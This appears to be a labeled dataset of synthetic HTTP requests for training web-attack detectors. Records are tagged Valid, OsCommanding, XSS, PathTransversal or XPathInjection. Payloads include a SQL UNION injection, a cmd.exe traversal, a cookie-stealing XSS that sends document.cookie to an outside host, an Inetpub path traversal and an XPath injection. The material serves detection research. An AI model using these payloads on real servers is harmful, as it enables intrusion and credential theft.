GET /shW1u8/orO9TsS_.HTN8J19-PlT/agIGoKRKxqZ/iwr7mvNnT/u@/QO3IDc/Nq5XdGa/rhta/t6etiebuaarruacl/hLaJWOMXlZ6vF@nI2kT/zrckeee4d/rspEyxAsnmca.msf?KCtKB=87&nneoeiOfciaens=5883&Suqa=%3B++EXEC%28+%27UNI%27%2B%27ON%27%2B%27+++++%27%2B%27SEL%27%2B%27ECT++++++%27e2i1e%27%2C2%2C153595%2C%27oamardrhoe%27%2C9++FROM++++tsdasLon4i%29&EEic=1309&Htreafon=nulloUs6l%5Cv HTTP/1.0
Host: www.m1taon.biz
Connection: close
Accept: audio/*
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.1, gzip;q=0.6, gzip;q=0.6, deflate
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 77.106.13.151
Cookie: sgv9d6cmnd=swci4syii;dhmooo=9319656;bwstcno=exi
Cookie2: $Version="3"
Date: Tue, 02 Dec 08 16:34:23 CET
ETag: W/"bFb127kl2ale7r@.kL9"
Expect: 100-continue
From: oeeetot@ecjsbsx.org
If-Modified-Since: Tue, 14 Nov 06 22:20:04 CET
If-Unmodified-Since: Sun, 12 Apr 09 02:40:15 GMT
If-Match: *
If-None-Match: "FrM9gcMispPKjG-cy"
If-Range: Tue, 30 May 06 20:09:39 UTC
Max-Forwards: 0
MIME-Version: 1.4
Pragma: cusnt=cde0tptk
Proxy-Authorization: Basic UmxkaXJ0OjNlaXU=
Authorization: Ng2eEW jwwi2aA=tNdexeg
Range: -2,109-7
Referer: /h0awi/aeNtrra3.doc
TE: chunked,chunked
Trailer: Warning
User-Agent: Mozilla/4.3 (Machintosh; U; Mac OS X 8.8; xn-3E; rv:8.7.6) Gecko/22038283
UA-CPU: Sparc
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: 1.6 www.cf5mc.html
Transfer-Encoding: compress
Upgrade: doyt/0.4, bE3yw/1.4, otunr5/6.9, 62V/0.3, trd9ad/7.6
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 253.219.42.72
X-Serial-Number: 514695691907
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35230
Start - Id: 10686
class: Valid
GET /ILm/a6tmpimgEmf/ch86zKXxXl7JvaL/aoirerccerosAeats/oB-Hu69O/eOt9d8dnuh0emhcivrtd/Dreeiinglyaha/dPoesaEsgarac/Ob/aFEemJm/itxsssr4dsbeAdiwn7.asp?gtb=077434&1wsanemssta=5583&RM10=%24trce&shngj1=oOnetcira&fsiw2r=2z+&sbOj=v1vv3hZ6&9mohmlea=ve&0lboot.iniJwgetkxv5nphp=ngsmauinznAzcota&1rillrQo=auxw.XHNv&o0h40nEa=whhjn%7CnextlosueNrea HTTP/1.0
Host: www.eauEdnI.be:80
Connection: Edhlaett
Accept: */*;q=0.1
Accept-Charset: shift_jis, koi8-r;q=0.8
Accept-Encoding: *
Accept-Language: t-wlm;q=0.4
Cache-Control: only-if-cached
Client-ip: 245.69.51.123
Cookie: 2sae=w-3B_4ZSh;nhtpassWV=|a
Cookie2: $Version="902"
Date: Tue, 15 Apr 08 15:24:43 GMT
ETag: "c7TaWn1qmplrGR5OVY"
Expect: 100-continue
From: spyi@hEtfsnh.ch
If-Modified-Since: Sat, 29 Oct 05 16:18:27 GMT
If-Unmodified-Since: Sat, 26 Mar 05 11:29:36 UTC
If-Match: "@v5Q5eXotlcRj0xv"
If-None-Match: *
If-Range: Mon, 12 Jun 06 08:26:16 UTC
Max-Forwards: 70
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Basic YW5uTnNhYzp3c2Vvd3Nz
Authorization: NTLM dWxsdG90bmNWbTJzeU51ZXVpaWJhZGRlZHNhYTBuMXN0ZWYybmM=
Range: 9268-2780
Referer: /6eahhaig.fgf
TE: trailers
Trailer: Accept-Language
User-Agent: tauesrsdy (iNQZAcYpLM; y46DlDfv; 6p-Uej; 8H4Alg)
UA-CPU: 68000
UA-Disp: 8769,6775,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 6678x842
Via: 2.5 www.iiikhtwn.png
Transfer-Encoding: gzip
Upgrade: g9iut/7.2, bobt/1.2
Warning: 661 58.176.214.95 "ctt1w" "Mon, 08 Aug 05 18:46:01 CET"
X-Forwarded-For: 87.119.214.253
X-Serial-Number: 61836030943693836544
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10686
Start - Id: 22515
class: Valid
GET /pctseahhe9evjigeibgi/bootmpmpMPFYOHi@-/jY.5Gdxterm/TrAVcNtmp1Xand.6/pAX.tiff? HTTP/1.0
Host: 30.3.118.38
Connection: close
Accept: */*;q=0.9
Accept-Charset: iso-10646-ucs-2, x-mac-hebrew, x-mac-arabic
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: min-fresh=10
Client-ip: 71.156.209.38
Cookie: rt=f.lHsudD.;kcytIva8bdgtE=0221580;efoIqOnikop=daeOa
Cookie2: $Version="767"
Date: Mon, 14 Jul 08 22:43:57 UTC
ETag: "z4OaVbtI6PaeC@x1_8Wl"
Expect: 100-continue
From: megsen@yhmnzeeaD.it
If-Modified-Since: Sat, 17 Dec 05 21:44:30 GMT
If-Unmodified-Since: Wed, 08 Aug 07 13:51:02 GMT
If-Match: *
If-None-Match: "NiwbBM0QcwbxlC63"
If-Range: *
Max-Forwards: 70
MIME-Version: 0.1
Pragma: 5nn5=wpNmd
Proxy-Authorization: NTLM ZU5SdHQ2cmxtZHRERWVFZWViYXI1QUluYVAxSmhvZW1JMGd0
Authorization: e2uwe cjoat=edn6
Range: 97-403959,415744-,056-023107
Referer: http://iepoc.biz/rieae/chelw.txt
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/6.1 (Windows; U; Win 9x 6.6; pt-ot; rv:2.1.9) Gecko/09010397
UA-CPU: Sparc
UA-Disp: 3911,9683,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 568x5684
Via: 2.7 www.sh9neYne.shtml, HTTP/4.0 196.111.154.217
Transfer-Encoding: 1mo3t
Upgrade: yul/1.8, gvic/9.5, hGaw/6.7, Hpe/9.6, dae/2.3
Warning: 050 42.224.216.74 "terFienh" "Wed, 12 Mar 08 09:39:17 GMT"
X-Forwarded-For: 147.15.113.44
X-Serial-Number: 0827164
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22515
Start - Id: 43778
class: OsCommanding
GET .%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 27.65.64.52:3598
Connection: close
Accept: */*;q=0.9
Accept-Charset: windows-1252;q=0.6, iso-8859-3;q=0.2, cp-932
Accept-Encoding: compress;q=0.3, gzip, gzip, gzip, compress;q=0.9
Accept-Language: 3i-ma;q=0.6, fnl-ewXes;q=0.3
Cache-Control: min-fresh=31950
Client-ip: 111.17.94.212
Cookie: bgin7im=asl"apacsdrop"atO/ 
Cookie2: $Version="47"
Date: Fri, 07 Aug 09 19:00:41 UTC
ETag: W/"AMC5ZOlrnU7y1Mew"
Expect: ttM2ahme
From: nrfbhece@hbiiwgu.org
If-Modified-Since: Tue, 08 Jun 04 18:22:45 CET
If-Unmodified-Since: Sun, 07 Oct 07 22:38:48 UTC
If-Match: *
If-None-Match: "cguqaf3NHWHjefI-DQ1"
If-Range: Mon, 09 Aug 04 08:31:48 CET
Max-Forwards: 5
MIME-Version: 7.5
Pragma: ts=drlowint
Proxy-Authorization: Digest opaque="leSssie"
Authorization: ifna sietuw=6ratieE
Range: 10571-03
Referer: http://www.ooNvhrot.de/satqoo2/wz8odt.js
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/1.9 (Windows; U; Win 9x 6.2; bn-Hs; rv:6.4.3) Gecko/94403380
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1293x0631
Via: 0.1 84.137.108.135:115, 7.5 www.al0m.js, FTP/9.4 www.tigtruei.html:36627
Transfer-Encoding: compress
Upgrade: ewh/0.7, qtnudf/8.8, ons9t/6.0, an7/8.9, raHeu/7.1
Warning: 658 www.Hscsmktn.js:3 "stszn923barrtxs" "Thu, 16 Oct 08 07:29:39 UTC"
X-Forwarded-For: 85.158.30.227
X-Serial-Number: 026026261334603
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43778
Start - Id: 16503
class: Valid
GET /faUzHxvzu3h@ayj70/Bjdrn/rx3UibtZVJuc1HeP.k4_/9.X9zscriptand@kT.jpg? HTTP/1.0
Host: www.dtdaoe.it
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: cp-932;q=0.9, macintosh, shift_jis
Accept-Encoding: gzip;q=0.2, deflate;q=0.0, identity;q=0.5, compress;q=0.6, deflate;q=0.6
Accept-Language: vtes-4, amtBT37-psn
Cache-Control: only-if-cached
Client-ip: 142.250.211.39
Cookie: aiPctandd0oesc=65979886;dvCtesdtig57tRn=ocW
Cookie2: $Version="56"
Date: Thu, 09 Oct 08 09:19:41 GMT
ETag: ".FCsSIgaLMIhXBHLq"
Expect: 100-continue
From: a3hb@rjzaoeAala.com
If-Modified-Since: Sat, 03 Nov 07 15:10:00 GMT
If-Unmodified-Since: Mon, 15 Feb 10 14:51:38 CET
If-Match: *
If-None-Match: "yUZoPV75ar26lvs5e1"
If-Range: Sat, 03 Apr 04 10:04:55 GMT
Max-Forwards: 753
MIME-Version: 0.2
Pragma: cnse=cre7
Proxy-Authorization: NTLM cmxwZ2E1eGdUTmdzNmVydGdib2VyczVyc3RhdG9pc2k=
Authorization: Basic d2xwVXJkeWk6dXdlZWVueG4=
Range: 90-3929,2123-,048886-
Referer: http://spwle8sr.cz/aiomhl6/egrshg.css
TE: trailers,gzip;q=0.6
Trailer: Via
User-Agent: 0rrsDjnrn (nzXN39.6; ncmAHVp; t7Fro_q.y; itRcLtcH@v)
UA-CPU: StrongARM
UA-Disp: 456,224,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 950x803
Via: 0Eg/4.0 www.waut.gif, 0.9 www.qAseo.tiff, HTTP/3.1 24.226.8.174
Transfer-Encoding: identity
Upgrade: doc/7.0, ari/9.3, s1yrm/6.9
Warning: 399 165.168.5.56 "Yeip137iXelsbw" 
X-Forwarded-For: 59.247.137.64
X-Serial-Number: 924261
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16503
Start - Id: 400
class: Valid
GET /si4snthoEvh/N99q/Df/rYl6rO/3huntcofl/bLc/3advgios/nVare/odmnerdnthtc7alswi/7sHehii3oeer9u/fMNgpBnrzCi7.cgi?insertMrS=qjnvneamnne&cemanr=aguuB8yMK_l&crIrcsic=laohst&Nz6t0=5082&TvR7=ngroup+bytTno2eoncin%3E HTTP/1.1
Host: 128.246.25.213
Connection: keep-alive
Accept: audio/*, application/*, image/jpeg;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: compress;q=0.4, compress
Accept-Language: nbI-utdeO5, Lonenm-n;q=0.2, y5-rs, oi9n-txypw, 7uttbm-brRi;q=0.1
Cache-Control: max-stale
Client-ip: 49.51.177.67
Cookie: h0must1a9utettE=967;mcDX.11V4=329;aangOixbW8m2e=7727397;voetdas=yxOdter d
Cookie2: $Version="619"
Date: Tue, 03 Nov 09 01:10:07 UTC
ETag: W/"AwOLswOcN9pF3VDj7D3g"
Expect: 100-continue
From: rPtoKwaw@nOdai.biz
If-Modified-Since: Mon, 15 Sep 08 12:18:46 CET
If-Unmodified-Since: Fri, 22 Dec 06 23:53:40 CET
If-Match: "PHx_aFUk5Db_t1OCvIB"
If-None-Match: *
If-Range: Wed, 29 Dec 04 17:29:02 UTC
Max-Forwards: 552
MIME-Version: 2.4
Pragma: drgtl='Rvkaahm'
Proxy-Authorization: Digest nonce
Authorization: lhytnI ngh3eih=idih
Range: 63476-77033,-529,5-
Referer: http://www.nucsmfzl.fr/staz/daahsaer/Xldnoeen/5yxaw/rynmFnin.asp
TE: gzip;q=0.1,trailers,deflate
Trailer: Accept-Encoding
User-Agent: ts0n4ea
UA-CPU: Sparc
UA-Disp: 6142,708,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 7545x2141
Via: HTTP/3.3 www.n0y2w.htm:5, HTTP/9.5 40.170.166.237
Transfer-Encoding: compress
Upgrade: sajgfN/7.8, n2wam/2.4
Warning: 939 www.gttieo.css "to6kdeaosjuise9qIc" "Sun, 24 Oct 04 22:57:30 GMT"
X-Forwarded-For: 117.218.252.232
X-Serial-Number: 5470041402
----: -------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 400
Start - Id: 47264
class: XSS
GET /a0NV/mew9aZ1V/blMxLxFRWJ_tq-/edtihoeojdp/r4wm8MXG3b/aoD0nraim/mctyEvx/Yt9wr6s8ByS/slta2t8.exe?Ix5nullfq=5a&iyertZcusb=acwindow.open&eeinTcrlttSse=e7%40Z&TRt=zrv+%29sp%3E%25s&ohxtaD=6&tuo=fq%40nthgi8euniontmeh%24iwgetautoexeci&1Db_g6SPmF=dnicuiS&aahSi=dlm%402O9e.L&En=%3Cobject++++classid++++%3D++++%22+clsid%3A...%22++++codebase%3D+%22+++++javascript%3A++++%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.chnail.com%2Fcgi-bin%2Fetis.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22%3E HTTP/1.1
Host: www.nnw8itot.ch
Connection: close
Accept: application/*;q=0.7, text/*
Accept-Charset: windows-1257, iso-8859-9;q=0.3, x-mac-roman;q=0.2, euc-tw, utf-8;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: soHuu685-oco, txwsit-deyr7rd, rs-jfwd;q=0.7
Cache-Control: max-stale=2
Client-ip: 10.37.184.28
Cookie: rI=:hediryOtue:;phy=eb20ebrlecme;95aontwk=sallediao2lcort;reu=nEft6i5;ncargntu=0670721;uLFx6S6BX=mtn
Cookie2: $Version="0"
Date: Mon, 23 Feb 09 19:54:14 CET
ETag: W/"23jIscF3AhyqY.WJB"
Expect: 100-continue
From: mP8eatM@krgt.fr
If-Modified-Since: Tue, 11 Sep 07 15:28:44 GMT
If-Unmodified-Since: Sun, 24 Jan 10 03:34:57 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 04 Mar 10 12:02:16 UTC
Max-Forwards: 5303
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: 6ndit medexEq=belmLsj
Authorization: Basic b2VucTc6aWhlZm5Fbg==
Range: -1,528-520677
Referer: /nfdhEhet/mrocdmai.rar
TE: deflate,trailers,deflate;q=0.4
Trailer: Warning
User-Agent: cdTxxuF http://www.s4eeee.it
UA-CPU: Sparc
UA-Disp: 5931,8389,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 753x7661
Via: 4.5 241.48.49.251, dryox/2.8 www.adbt.shtml:3, hrw/9.8 81.77.9.175
Transfer-Encoding: deflate
Upgrade: 2gkxie/3.5, ehnI/4.4
Warning: 816 www.tnnynhia.jpg:19076 "wwNrihTcIteeag" "Sat, 20 Oct 07 01:41:20 GMT"
X-Forwarded-For: 228.59.131.84
X-Serial-Number: 15152704800
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47264
Start - Id: 32292
class: Valid
GET /oLB-3gEmgDjnNuGmu/g6dL0o9V/eAvrK@PJoTFY/Lex/8isrdbhticrv/2Jm6mEa.OX/rtblxEottr1tt/iJp6EJ_NPUSIslaAl4GB/ozenhsem/uItU9H1ZP7wN9u/r9lPqW3mYsFR7R.d/Exgayoel5zerg.mdb?ns=29409283&dyeeAettfe=r++9&dbIsuf4renb=48192632&V4ubke=fwNsCs_9D&auqpdede=ebo&sa=8681658943&DJrSK9Y=t HTTP/1.0
Host: www.tcersoSr0b.biz
Connection: keep-alive
Accept: */*
Accept-Charset: euc-cn, iso-8859-1, windows-1253
Accept-Encoding: identity;q=0.0, deflate
Accept-Language: ydt-ng
Cache-Control: max-stale=6
Client-ip: 28.110.196.114
Cookie: oehdaanm= |;cvuofeykst2=kBX;ah2rota=t\uanehp8mLtnx;fdaIre1r=s;;ta5senuarruwTT=7576
Cookie2: $Version="02"
Date: Mon, 25 Oct 04 12:39:30 CET
ETag: "5PC@hhpJ@Jsu8Oiv"
Expect: 3zih
From: mnonn5h@wlv1.be
If-Modified-Since: Mon, 13 Dec 04 02:38:21 CET
If-Unmodified-Since: Tue, 02 Sep 08 21:52:17 UTC
If-Match: *
If-None-Match: "i@d7O5j5vRls8SH"
If-Range: Fri, 30 Jul 04 15:18:12 GMT
Max-Forwards: 6528
MIME-Version: 9.5
Pragma: le8tefn='nyek'
Proxy-Authorization: eqcroe eh0ts=bnu9dnt
Authorization: orC5 4uen4ieR=bqbG8
Range: -05910,24859-707033
Referer: /eunLlbAa/or5e/2iatnpa/otGa.jpg
TE: trailers,trailers,deflate;q=0.5
Trailer: Date
User-Agent: 4brawhc0o/2.7.6.2.5
UA-CPU: x86
UA-Disp: 096,809,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3225x292
Via: FTP/3.5 www.5Lltdets.htm, 9.2 65.106.73.53
Transfer-Encoding: identity
Upgrade: oaitd/4.1, HovhhT/4.8, riGey/3.3, ga1y/9.4
Warning: 188 128.175.35.78:84438 "S5oiobSrnbBr6fnyRoo" "Thu, 12 Oct 06 18:58:00 GMT"
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 7859774427
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 32292
Start - Id: 24747
class: Valid
GET /rnolEA0xDY/tisopylceegddOr/aPEBfBzZ/wxXAO/elegtee0itehstn0/batyitHr5/feuo9v0vthmeeieate/iwaEHjzmR9XioV4Czn/wgd/4Q4MEzgYOVA/iCizr3j/u7e5nsoeins.jpeg? HTTP/1.1
Host: 247.160.84.241:80
Connection: a4tatSt
Accept: video/mpeg, application/postscript
Accept-Charset: euc-tw;q=0.0
Accept-Encoding: identity;q=0.5, identity, identity;q=0.0
Accept-Language: m-ye8sn;q=0.2, t-ok, a9Sgna-asr, eotrln9s-aet;q=0.3, sei-xe2ueia;q=0.0
Cache-Control: Lfe6tfl='ss3smtsa'
Client-ip: 113.251.255.211
Cookie: eafBesRress=39;DRNN=eetitnoretmzai;uolmaauepn5ct2=i$connect)iV0rfu;bncaaeiSyne=oapi
Cookie2: $Version="71"
Date: Sat, 21 Nov 09 05:37:01 UTC
ETag: W/"dQa0AbWjuPlCGrb"
Expect: 100-continue
From: 4Pioe@levcc.org
If-Modified-Since: Fri, 13 Mar 09 08:52:51 CET
If-Unmodified-Since: Sun, 02 Apr 06 22:18:45 GMT
If-Match: "SD0NfJpICozGuYP"
If-None-Match: "5HR_@AOetKmQ.0xb-r"
If-Range: Mon, 10 Mar 08 14:10:46 GMT
Max-Forwards: 9
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM a0ZwemhFeE9pc041aHNhQWhvZXJycGxpb2VyaW8wQ2VlaVZzZXdhWmg=
Authorization: Digest cnonce="Aei0seee"
Range: 991-
Referer: /rtdkn/8nae/Rp65s/5osaft.ace
TE: trailers,deflate;q=0.0
Trailer: Upgrade
User-Agent: iTelrOdaoojrheedares
UA-CPU: StrongARM
UA-Disp: 572,4672,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1017x8120
Via: 9.7 www.idanbGe.tiff:5, too/0.9 15.95.216.172
Transfer-Encoding: deflate
Upgrade: 0ms/1.3, awuais/6.3
Warning: 152 www.nuoOelo.jpg "ddh66yrn" "Wed, 01 Jun 05 18:22:47 UTC"
X-Forwarded-For: 127.43.236.207
X-Serial-Number: 319119855540809
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 24747
Start - Id: 23122
class: Valid
GET /S2W/raCbVhbmU.msf?ne6vtaalasnyTng=901406&oo=96977&sithnl4ornoy=9394411111&rgISuvRob=80&AmsIksz=YhEalu HTTP/1.1
Host: 88.35.190.189:80
Connection: lastoe
Accept: image/*;q=0.2, text/*, text/xml
Accept-Charset: x-mac-hebrew, x-mac-greek
Accept-Encoding: gzip, identity, gzip
Accept-Language: oiOl-tuR3daye;q=0.4, E-ImRutq, onea-tueoli, s-dttEaabi, zce-rsu0e
Cache-Control: no-store
Client-ip: 67.228.68.4
Cookie: e3fglocationBdL9Q=-bO1eeaccess_logae2wuHts;b1sisRu=l%vol;deleteStmp4VSoE=87791
Cookie2: $Version="0"
Date: Thu, 04 May 06 02:41:41 CET
ETag: "3.I9kRFBydMo6wPbyXB"
Expect: 100-continue
From: Hocan@osthutarg1.biz
If-Modified-Since: Sat, 19 Dec 09 12:29:24 GMT
If-Unmodified-Since: Tue, 24 Aug 04 03:10:13 CET
If-Match: *
If-None-Match: "wrsdnb.Y9MfcsCl"
If-Range: Mon, 23 Apr 07 11:18:20 CET
Max-Forwards: 8
MIME-Version: 8.3
Pragma: enht=8fu
Proxy-Authorization: sreaa nzhdndbb=rDnD
Authorization: Digest realm
Range: -515103
Referer: http://www.err7tr.be/sjsR/nemrekd/deAetJd/eyairR/gsstXe.pdf
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/2.2 (Machintosh; U; PPC Mac OS X 1.5; bn-ef; rv:2.4.2) Gecko/31466742
UA-CPU: PowerPC
UA-Disp: 519,575,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0764x660
Via: HTTP/6.5 61.244.69.120
Transfer-Encoding: t5e7
Upgrade: 3TN5i/2.0, ahqf9e/8.2, azaefr/2.4
Warning: 833 www.aoOY.gif:0 "EwtnsedDuiLseekhe" "Fri, 03 Mar 06 17:54:30 GMT"
X-Forwarded-For: 72.82.227.173
X-Serial-Number: 026545042
----: -----------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 23122
Start - Id: 36025
class: PathTransversal
GET /6ardt8obmemamEt5/i3s.qH9fmfh5/YXxwboot.inip3u%uupo/ymtN0eaoacwb1tpoqo/hh1Zn6R43TrxNCxxOpv/UM.seOH/ll/eLgsR/heaetfeeesFwtn/bin_tRpsiTWA2I7wp-fH/oeaAnilwaeii/rW0vjzQY_NcCK.gif?dDaivm=2698232&aoom=moctlsruhhAy&rsednh1p2m=eMqfX&Nond2ni=o6gestpy&nsarftf466herli=pte%29eixn3nyandro&.jHJl=577&cslrleapu1frl=o8ry&s0gnhAec2iNOee=cFRlptZberOh&sReibWem=69&oh5udh8wtlleoi=oo%26r4%3Ft%2F&tieq9Sm1Seiin=gwQM&aogtBoniGbet=oL&srht=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fnail%2Flldeenat%2Fratoieleti%2Ftiesngchor.php HTTP/1.0
Host: 121.233.205.23:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: compress, gzip;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 55.18.97.213
Cookie: Ed2ses=142;t8Ovtt1enenaat=wtSohd;ls9daovesatcMAe=en i;dneesiei067=tQbm
Cookie2: $Version="5"
Date: Tue, 23 Feb 10 09:19:12 UTC
ETag: "1a58EMborIstQSXjUbu@"
Expect: 100-continue
From: eahHqSh@pqrt.com
If-Modified-Since: Fri, 24 Oct 08 06:46:06 CET
If-Unmodified-Since: Wed, 03 Aug 05 16:08:54 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 03 Jul 09 16:36:31 UTC
Max-Forwards: 7012
MIME-Version: 2.1
Pragma: yr=en2n
Proxy-Authorization: NTLM bmFiRXRsbmlnZXplYWxzTml1bWVlYWVyYWFzdHNkZDh4YTE0bmo=
Authorization: NTLM OW1pZjNldGFhYXJuZW9ic21kc290MGV3dGVncm5pOWZsZXB6ZWRnbWRwM2llbg==
Range: -05066,-92,-024075
Referer: http://iiOinCn.fr/enae/uresetan.jsp
TE: chunked;q=0.5
Trailer: User-Agent
User-Agent: l-4hUBI http://www.tcdlw.de
UA-Disp: 097,2396,8
UA-OS: Windows 95
UA-Color: color8
Via: 3.8 241.0.82.130
Transfer-Encoding: eeef
Upgrade: vki/8.2, ltp2/4.4, eeft/1.6
Warning: 341 181.125.130.56 "jenecjbHicooniain4f" "Thu, 13 Apr 06 16:57:19 GMT"
X-Forwarded-For: 99.130.22.61
X-Serial-Number: 83480
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36025
Start - Id: 19153
class: Valid
GET /HhRZupiK/rRmTb/iwehen4otO.jpg?8wRaoO=9681860&ure=ncboot.ini&CVqgQNkFE=9&nksiear0=50096&hoi2tABilm=ntseiI9%3Cf&lsf=sv3Q.ZLrg&ymmozgYioioeoQ=97380923&lprrb4=1461484 HTTP/1.0
Host: 133.186.12.245
Connection: close
Accept: video/*;q=0.0, application/*;q=0.5, image/*
Accept-Charset: iso-2022-jp, x-mac-roman;q=0.9
Accept-Encoding: *;q=0.1
Accept-Language: Izldtei-he6o9h;q=0.9, cotig-peN;q=0.2, 4-o;q=0.2, nnDdt-s;q=0.5, a-nzl
Cache-Control: oxhsh='yu'
Client-ip: 232.206.216.97
Cookie: iYvU=c+eh@;eiEdtsDine0exia=t;eUeoeRysktheeni=gercr
Cookie2: $Version="746"
Date: Sat, 01 Jan 05 15:41:58 CET
ETag: W/"eKP35ifDThMvjLc-p"
Expect: 100-continue
From: wgnl@sel6ocu.cz
If-Modified-Since: Wed, 30 Dec 09 05:14:53 CET
If-Unmodified-Since: Fri, 13 Aug 04 03:32:21 CET
If-Match: *
If-None-Match: *
If-Range: "H3VOUp7cnBqy8T9PT3Lo"
Max-Forwards: 8
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM N25qRXB5YW5BNk92Nk55aWVlbm1Dc2hzYW5heXNTd3JtaW55
Authorization: oxea t9llrjyt=m7moteDl
Range: -26751,992963-79665,-06526
Referer: http://2rf5.it/eeeia/ayeo1prh/sjtq.jsp
TE: deflate;q=0.8,trailers
Trailer: Transfer-Encoding
User-Agent: aJQESpIAOW http://www.5taet.biz
UA-CPU: x86
UA-Disp: 070,359,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8378x546
Via: FTP/4.0 www.6yii.jpeg, 9fr/5.2 www.eptnm.gif:329
Transfer-Encoding: m32az; anfaaagl=w2reUl
Upgrade: oiv/4.6, cunS0/6.8, iten/9.5, sszmK/2.3, i5od/3.4
Warning: 420 www.actoit.htm "nyml7olireede" "Tue, 02 Nov 04 22:52:56 UTC"
X-Forwarded-For: 199.173.139.84
X-Serial-Number: 0241089551352273
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19153
Start - Id: 48538
class: XPathInjection
POST /n0bm.Wg5UpBGmFet7F./7mail1g26cD/tzYfK/e5w2@/rp24j1Z/cd/rcrecaasy.mspx? HTTP/1.1
Content-Length: 424
Content-Language: iw
Content-Encoding: gzip
Content-Location: /jpran/pan1od.swf
Content-MD5: bjk2NGFpVmV0dHJ4c0Nhcw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 01 Apr 09 08:11:59 UTC
Last-Modified: Sat, 18 Jul 09 01:47:21 UTC
Host: 5.24.25.89
Connection: keep-alive
Accept: audio/*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: identity, gzip
Accept-Language: *
Cache-Control: min-fresh=0
Client-ip: 61.82.105.60
Cookie: tvl9ed19poeuh2O=hbsTtGhtsUhEsef
Cookie2: $Version="6"
Date: Mon, 14 Jan 08 16:34:29 UTC
ETag: "GcXnmUBFxWJV.V3_q"
Expect: ulHtWen3
From: l7hgtc@eorr.be
If-Modified-Since: Thu, 12 May 05 09:13:39 CET
If-Unmodified-Since: Wed, 04 Apr 07 19:11:19 CET
If-Match: *
If-None-Match: *
If-Range: "fx6n5Sfvf-ttZzmo"
Max-Forwards: 5450
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: hheeaG dehOfn=ka3m
Authorization: NTLM cmVybnJuc3RkaWE2UGhzZ2llU3VoaG9sZWVhNmF1dWF0amc3b29uUmhlbmV0dTc=
Range: 8664-
Referer: http://uDpsa.st/iqsd/gomu.tiff
TE: deflate;q=0.8,trailers,deflate;q=0.6
Trailer: Max-Forwards
User-Agent: Mozilla/2.1 (Machintosh; U; PPC Mac OS X 6.5; ts-2s; rv:1.1.9) Gecko/22129169
UA-CPU: StrongARM
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 429x1759
Via: 9.3 189.251.16.174, 7.0 52.194.128.111:54646, FTP/1.8 www.0onii.html
Transfer-Encoding: gzip
Warning: 055 209.226.85.199:70292 "mEpIrti5alp3ed" "Wed, 13 Sep 06 22:52:18 CET"
X-Forwarded-For: 252.38.234.200
X-Serial-Number: 7572286452988
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eog=u7onTm' or  count( path/child::node()[position(    )=((   i  +    j    +k   + l+    1)]     |    path/child::*()[position()=(k+1)])=1     or  'oih'    =  '    o7ekto'  or&nh0y=]Natmptgymi\eftpat  &aebg=neiantkidieSfnnb&ae4Es4arn=-d&nrreiBsmapathtr=so9rtod9hgnhM4&hnhlStgtl2au=rw&cN2uhoits=06530368&Aedn5fhe=fJ6m73GrT&At=e'57ohen2sslid

End - Id: 48538
Start - Id: 2725
class: Valid
